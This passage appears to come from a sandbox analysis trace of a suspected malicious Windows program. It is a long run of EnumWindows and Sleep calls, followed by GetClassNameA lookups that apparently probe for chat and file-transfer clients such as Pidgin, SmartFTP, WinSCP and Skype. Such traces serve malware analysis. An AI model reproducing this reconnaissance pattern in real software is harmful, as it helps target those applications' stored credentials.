(lpEnumFunc=0x523ec0, lParam=0x2830000) [0196.251] Sleep (dwMilliseconds=0x64) [0196.331] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0196.332] Sleep (dwMilliseconds=0x64) [0196.389] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0196.390] Sleep (dwMilliseconds=0x64) [0196.430] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0196.431] Sleep (dwMilliseconds=0x64) [0196.480] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0196.481] Sleep (dwMilliseconds=0x64) [0196.496] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0196.497] Sleep (dwMilliseconds=0x64) [0196.533] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0196.534] Sleep (dwMilliseconds=0x64) [0196.617] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0196.618] Sleep (dwMilliseconds=0x64) [0196.712] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0196.713] Sleep (dwMilliseconds=0x64) [0196.734] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0196.737] Sleep (dwMilliseconds=0x64) [0196.782] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0196.783] Sleep (dwMilliseconds=0x64) [0196.828] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0196.829] Sleep (dwMilliseconds=0x64) [0196.840] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0196.841] Sleep (dwMilliseconds=0x64) [0196.907] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0196.908] Sleep (dwMilliseconds=0x64) [0197.045] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0197.046] Sleep (dwMilliseconds=0x64) [0197.120] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0197.120] Sleep (dwMilliseconds=0x64) [0197.172] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0197.173] Sleep (dwMilliseconds=0x64) [0197.227] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0197.228] Sleep (dwMilliseconds=0x64) [0197.301] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0197.302] Sleep (dwMilliseconds=0x64) [0197.313] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0197.315] Sleep (dwMilliseconds=0x64) [0197.383] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0197.384] Sleep (dwMilliseconds=0x64) [0197.425] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0197.485] Sleep (dwMilliseconds=0x64) [0197.543] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0197.544] Sleep (dwMilliseconds=0x64) [0197.658] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0197.658] Sleep (dwMilliseconds=0x64) [0197.740] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0197.741] Sleep (dwMilliseconds=0x64) [0197.879] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0197.880] Sleep (dwMilliseconds=0x64) [0197.937] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0197.937] Sleep (dwMilliseconds=0x64) [0198.045] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.046] Sleep (dwMilliseconds=0x64) [0198.095] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.096] Sleep (dwMilliseconds=0x64) [0198.267] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.411] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.412] Sleep (dwMilliseconds=0x64) [0198.471] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.476] Sleep (dwMilliseconds=0x64) [0198.477] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.478] Sleep (dwMilliseconds=0x64) [0198.480] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.480] Sleep (dwMilliseconds=0x64) [0198.482] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.482] Sleep (dwMilliseconds=0x64) [0198.484] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.485] Sleep (dwMilliseconds=0x64) [0198.486] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.486] Sleep (dwMilliseconds=0x64) [0198.488] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.488] Sleep (dwMilliseconds=0x64) [0198.490] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.490] Sleep (dwMilliseconds=0x64) [0198.492] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.492] Sleep (dwMilliseconds=0x64) [0198.494] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.494] Sleep (dwMilliseconds=0x64) [0198.496] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.496] Sleep (dwMilliseconds=0x64) [0198.498] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.498] Sleep (dwMilliseconds=0x64) [0198.503] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.504] Sleep (dwMilliseconds=0x64) [0198.505] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.506] Sleep (dwMilliseconds=0x64) [0198.507] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.507] Sleep (dwMilliseconds=0x64) [0198.509] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.509] Sleep (dwMilliseconds=0x64) [0198.511] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.511] Sleep (dwMilliseconds=0x64) [0198.513] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.514] Sleep (dwMilliseconds=0x64) [0198.515] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.516] Sleep (dwMilliseconds=0x64) [0198.517] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.517] Sleep (dwMilliseconds=0x64) [0198.519] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.519] Sleep (dwMilliseconds=0x64) [0198.521] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.521] Sleep (dwMilliseconds=0x64) [0198.524] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.524] Sleep (dwMilliseconds=0x64) [0198.525] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.526] Sleep (dwMilliseconds=0x64) [0198.527] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.528] Sleep (dwMilliseconds=0x64) [0198.530] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.530] Sleep (dwMilliseconds=0x64) [0198.531] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.532] Sleep (dwMilliseconds=0x64) [0198.533] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.534] Sleep (dwMilliseconds=0x64) [0198.537] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.538] Sleep (dwMilliseconds=0x64) [0198.543] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.543] Sleep (dwMilliseconds=0x64) [0198.548] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.549] Sleep (dwMilliseconds=0x64) [0198.554] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.554] Sleep (dwMilliseconds=0x64) [0198.561] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.562] Sleep (dwMilliseconds=0x64) [0198.563] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.564] Sleep (dwMilliseconds=0x64) [0198.566] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.567] Sleep (dwMilliseconds=0x64) [0198.569] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.569] Sleep (dwMilliseconds=0x64) [0198.572] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.572] Sleep (dwMilliseconds=0x64) [0198.574] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.575] Sleep (dwMilliseconds=0x64) [0198.578] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.579] Sleep (dwMilliseconds=0x64) [0198.580] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.581] Sleep (dwMilliseconds=0x64) [0198.582] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.583] Sleep (dwMilliseconds=0x64) [0198.585] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.585] Sleep (dwMilliseconds=0x64) [0198.587] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.588] Sleep (dwMilliseconds=0x64) [0198.592] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.592] Sleep (dwMilliseconds=0x64) [0198.594] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.594] Sleep (dwMilliseconds=0x64) [0198.596] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.597] Sleep (dwMilliseconds=0x64) [0198.598] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.598] Sleep (dwMilliseconds=0x64) [0198.600] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.601] Sleep (dwMilliseconds=0x64) [0198.602] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.603] Sleep (dwMilliseconds=0x64) [0198.604] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.604] Sleep (dwMilliseconds=0x64) [0198.606] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.606] Sleep (dwMilliseconds=0x64) [0198.608] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.608] Sleep (dwMilliseconds=0x64) [0198.610] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.611] Sleep (dwMilliseconds=0x64) [0198.612] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.613] Sleep (dwMilliseconds=0x64) [0198.614] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.614] Sleep (dwMilliseconds=0x64) [0198.616] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.616] Sleep (dwMilliseconds=0x64) [0198.618] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.618] Sleep (dwMilliseconds=0x64) [0198.620] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.620] Sleep (dwMilliseconds=0x64) [0198.626] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.626] Sleep (dwMilliseconds=0x64) [0198.628] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.628] Sleep (dwMilliseconds=0x64) [0198.629] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.630] Sleep (dwMilliseconds=0x64) [0198.735] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.737] Sleep (dwMilliseconds=0x64) [0198.861] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.863] Sleep (dwMilliseconds=0x64) [0198.919] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.920] Sleep (dwMilliseconds=0x64) [0198.978] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0198.978] Sleep (dwMilliseconds=0x64) [0199.103] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0199.105] Sleep (dwMilliseconds=0x64) [0199.194] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0199.196] Sleep (dwMilliseconds=0x64) [0199.268] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0199.289] Sleep (dwMilliseconds=0x64) [0199.291] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0199.292] Sleep (dwMilliseconds=0x64) [0199.293] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0199.294] Sleep (dwMilliseconds=0x64) [0199.295] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0199.295] Sleep (dwMilliseconds=0x64) [0199.297] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0199.297] Sleep (dwMilliseconds=0x64) [0199.299] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0199.299] Sleep (dwMilliseconds=0x64) [0199.301] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0199.301] Sleep (dwMilliseconds=0x64) [0199.302] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0199.303] Sleep (dwMilliseconds=0x64) [0199.304] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0199.305] Sleep (dwMilliseconds=0x64) [0199.306] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0199.307] Sleep (dwMilliseconds=0x64) [0199.320] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0199.323] Sleep (dwMilliseconds=0x64) [0199.324] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0199.325] Sleep (dwMilliseconds=0x64) [0199.326] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0199.327] Sleep (dwMilliseconds=0x64) [0199.328] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0199.329] Sleep (dwMilliseconds=0x64) [0199.331] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0199.331] Sleep (dwMilliseconds=0x64) [0199.332] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0199.333] Sleep (dwMilliseconds=0x64) [0199.334] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0199.335] Sleep (dwMilliseconds=0x64) [0199.336] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0199.337] Sleep (dwMilliseconds=0x64) [0199.338] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0199.339] Sleep (dwMilliseconds=0x64) [0199.340] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0199.341] Sleep (dwMilliseconds=0x64) [0199.342] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0199.343] Sleep (dwMilliseconds=0x64) [0199.345] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0199.346] Sleep (dwMilliseconds=0x64) [0199.347] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0199.348] Sleep (dwMilliseconds=0x64) [0199.349] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0199.350] Sleep (dwMilliseconds=0x64) [0199.351] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0199.352] Sleep (dwMilliseconds=0x64) [0199.353] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0199.354] Sleep (dwMilliseconds=0x64) [0199.356] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0199.356] Sleep (dwMilliseconds=0x64) [0199.358] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0199.358] Sleep (dwMilliseconds=0x64) [0199.441] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0199.442] Sleep (dwMilliseconds=0x64) [0199.502] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0199.503] Sleep (dwMilliseconds=0x64) [0199.520] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0199.521] Sleep (dwMilliseconds=0x64) [0199.586] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0199.587] Sleep (dwMilliseconds=0x64) [0199.669] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0199.669] Sleep (dwMilliseconds=0x64) [0199.697] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0199.698] Sleep (dwMilliseconds=0x64) [0199.766] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0199.898] Sleep (dwMilliseconds=0x64) [0199.952] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0199.953] Sleep (dwMilliseconds=0x64) [0199.963] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0199.964] Sleep (dwMilliseconds=0x64) [0200.082] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0200.083] Sleep (dwMilliseconds=0x64) [0200.208] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0200.209] Sleep (dwMilliseconds=0x64) [0200.323] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0200.323] Sleep (dwMilliseconds=0x64) [0200.354] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0200.355] Sleep (dwMilliseconds=0x64) [0200.428] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0200.429] Sleep (dwMilliseconds=0x64) [0200.499] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0200.501] Sleep (dwMilliseconds=0x64) [0200.562] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0200.564] Sleep (dwMilliseconds=0x64) [0200.635] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0200.636] Sleep (dwMilliseconds=0x64) [0200.710] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0200.710] Sleep (dwMilliseconds=0x64) [0200.752] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0200.752] Sleep (dwMilliseconds=0x64) [0200.830] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0200.831] Sleep (dwMilliseconds=0x64) [0200.902] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0200.903] Sleep (dwMilliseconds=0x64) [0200.982] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0200.983] Sleep (dwMilliseconds=0x64) [0201.078] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0201.079] Sleep (dwMilliseconds=0x64) [0201.158] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0201.159] Sleep (dwMilliseconds=0x64) [0201.244] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0201.245] Sleep (dwMilliseconds=0x64) [0201.307] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0201.308] Sleep (dwMilliseconds=0x64) [0201.390] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0201.391] Sleep (dwMilliseconds=0x64) [0201.514] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0201.515] Sleep (dwMilliseconds=0x64) [0201.592] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0201.593] Sleep (dwMilliseconds=0x64) [0201.638] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0201.639] Sleep (dwMilliseconds=0x64) [0201.722] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0201.723] Sleep (dwMilliseconds=0x64) [0201.854] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0201.855] Sleep (dwMilliseconds=0x64) [0201.924] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0201.925] Sleep (dwMilliseconds=0x64) [0201.993] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0201.994] Sleep (dwMilliseconds=0x64) [0202.113] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0202.115] Sleep (dwMilliseconds=0x64) [0202.178] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0202.228] Sleep (dwMilliseconds=0x64) [0202.300] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0202.301] Sleep (dwMilliseconds=0x64) [0202.396] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0202.399] Sleep (dwMilliseconds=0x64) [0202.448] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0202.449] Sleep (dwMilliseconds=0x64) [0202.508] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0202.510] Sleep (dwMilliseconds=0x64) [0202.590] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0202.591] Sleep (dwMilliseconds=0x64) [0202.756] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0202.759] Sleep (dwMilliseconds=0x64) [0202.800] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0202.801] Sleep (dwMilliseconds=0x64) [0202.884] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0202.885] Sleep (dwMilliseconds=0x64) [0202.960] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0202.961] Sleep (dwMilliseconds=0x64) [0203.053] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0203.055] Sleep (dwMilliseconds=0x64) [0203.105] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0203.106] Sleep (dwMilliseconds=0x64) [0203.176] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0203.176] Sleep (dwMilliseconds=0x64) [0203.256] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0203.257] Sleep (dwMilliseconds=0x64) [0203.295] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0203.296] Sleep (dwMilliseconds=0x64) [0203.379] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0203.381] Sleep (dwMilliseconds=0x64) [0203.482] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0203.483] Sleep (dwMilliseconds=0x64) [0203.534] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0203.535] Sleep (dwMilliseconds=0x64) [0203.597] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0203.598] Sleep (dwMilliseconds=0x64) [0203.678] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0203.680] Sleep (dwMilliseconds=0x64) [0203.750] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0203.751] Sleep (dwMilliseconds=0x64) [0203.795] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) returned 1 [0203.796] GetClassNameA (in: hWnd=0x100e0, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="Worker Window") returned 13 [0203.797] GetClassNameA (in: hWnd=0x10128, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="ForegroundStaging") returned 17 [0203.797] GetClassNameA (in: hWnd=0x100f8, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="ForegroundStaging") returned 17 [0203.797] GetClassNameA (in: hWnd=0x10106, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0203.797] GetClassNameA (in: hWnd=0x1010a, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0203.797] GetClassNameA (in: hWnd=0x1010c, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0203.797] GetClassNameA (in: hWnd=0x10108, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0203.797] GetClassNameA (in: hWnd=0x10104, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0203.797] GetClassNameA (in: hWnd=0x10102, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputTopWndClass") returned 22 [0203.797] GetClassNameA (in: hWnd=0x10100, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0203.797] GetClassNameA (in: hWnd=0x100fe, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0203.797] GetClassNameA (in: hWnd=0x1016a, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0203.797] GetClassNameA (in: hWnd=0x1015e, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0203.797] GetClassNameA (in: hWnd=0x1014e, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0203.797] GetClassNameA (in: hWnd=0x100fc, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0203.797] GetClassNameA (in: hWnd=0x100ec, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="ApplicationManager_ImmersiveShellWindow") returned 39 [0203.797] GetClassNameA (in: hWnd=0x10186, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="URL Moniker Notification Window") returned 31 [0203.798] GetClassNameA (in: hWnd=0x1017e, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="VSyncHelper-0000000005E2DC10-1624832") returned 36 [0203.798] GetClassNameA (in: hWnd=0x10176, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="RawInputClass") returned 13 [0203.798] GetClassNameA (in: hWnd=0x10170, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="Internet Explorer_Hidden") returned 24 [0203.798] GetClassNameA (in: hWnd=0x100ca, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0203.798] GetClassNameA (in: hWnd=0x100a4, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0203.798] GetClassNameA (in: hWnd=0x100a8, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0203.798] GetClassNameA (in: hWnd=0x100b4, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0203.798] GetClassNameA (in: hWnd=0x100be, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0203.798] GetClassNameA (in: hWnd=0x100c2, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0203.798] GetClassNameA (in: hWnd=0x1008c, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0203.798] GetClassNameA (in: hWnd=0x10098, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0203.798] GetClassNameA (in: hWnd=0x100bc, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0203.798] GetClassNameA (in: hWnd=0x10080, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="Shell_TrayWnd") returned 13 [0203.798] GetClassNameA (in: hWnd=0x20048, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="ATL:00007FFB0FD84120") returned 20 [0203.798] GetClassNameA (in: hWnd=0x100d6, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0203.798] GetClassNameA (in: hWnd=0x100cc, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="TaskListThumbnailWnd") returned 20 [0203.798] GetClassNameA (in: hWnd=0x701ec, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="ConsoleWindowClass") returned 18 [0203.798] GetClassNameA (in: hWnd=0x302c6, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="ConsoleWindowClass") returned 18 [0203.798] GetClassNameA (in: hWnd=0x302c2, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="URL Moniker Notification Window") returned 31 [0203.799] GetClassNameA (in: hWnd=0x302b2, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="URL Moniker Notification Window") returned 31 [0203.799] GetClassNameA (in: hWnd=0x202ce, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="TabThumbnailWindow") returned 18 [0203.799] GetClassNameA (in: hWnd=0x202d8, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="VSyncHelper-0471A7A0-8903f25") returned 28 [0203.799] GetClassNameA (in: hWnd=0xf0070, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="Alternate Owner") returned 15 [0203.799] GetClassNameA (in: hWnd=0x202c4, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0203.799] GetClassNameA (in: hWnd=0x10374, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0203.799] GetClassNameA (in: hWnd=0x10368, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="pidgin_window") returned 13 [0203.799] GetClassNameA (in: hWnd=0x10366, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="smartftpwin") returned 11 [0203.799] GetClassNameA (in: hWnd=0x10362, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="winscp_") returned 7 [0203.799] GetClassNameA (in: hWnd=0x10364, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="active-charge") returned 13 [0203.799] GetClassNameA (in: hWnd=0x10360, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="skypecls") returned 8 [0203.799] GetClassNameA (in: hWnd=0x1035e, 